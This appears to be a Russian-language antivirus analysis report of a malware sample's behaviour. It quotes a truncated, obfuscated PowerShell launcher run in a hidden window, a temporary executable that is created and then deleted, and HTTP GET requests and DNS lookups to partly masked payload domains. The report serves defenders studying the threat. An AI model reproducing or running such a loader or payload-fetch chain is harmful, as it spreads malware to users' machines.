Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$( set-VariABLe 'OfS' '' ) "+[sTriNG]( (107,37 ,32,59, 114,33 , 42,56 , 98 , 32 , 45 , 37 , 42, 44, 59,111 , 1, 42,59, 97 ,24,42 ,45 , 12 ,35,38, 42 , 33 ,59,116,107 ,37, 61 ,38, 114 , 104 , ...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\643.exe
Удаляет следующие файлы
- %TEMP%\643.exe
Сетевая активность
Подключается к
- 'im###idlee.com':80
- 'br###s.org.uk':80
TCP
Запросы HTTP GET
- http://im###idlee.com/rczMx/
- http://www.br###s.org.uk/w1FpCyX/
UDP
- DNS ASK me###staad.com
- DNS ASK bo##biz.net
- DNS ASK im###idlee.com
- DNS ASK br###s.org.uk
- DNS ASK av###eather.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$( set-VariABLe 'OfS' '' ) "+[sTriNG]( (107,37 ,32,59, 114,33 , 42,56 , 98 , 32 , 45 , 37 , 42, 44, 59,111 , 1, 42,59, 97 ,24,42 ,45 , 12 ,35,38, 42 , 33 ,59,116,107 ,37, 61 ,38, 114 , 104 , ...' (со скрытым окном)
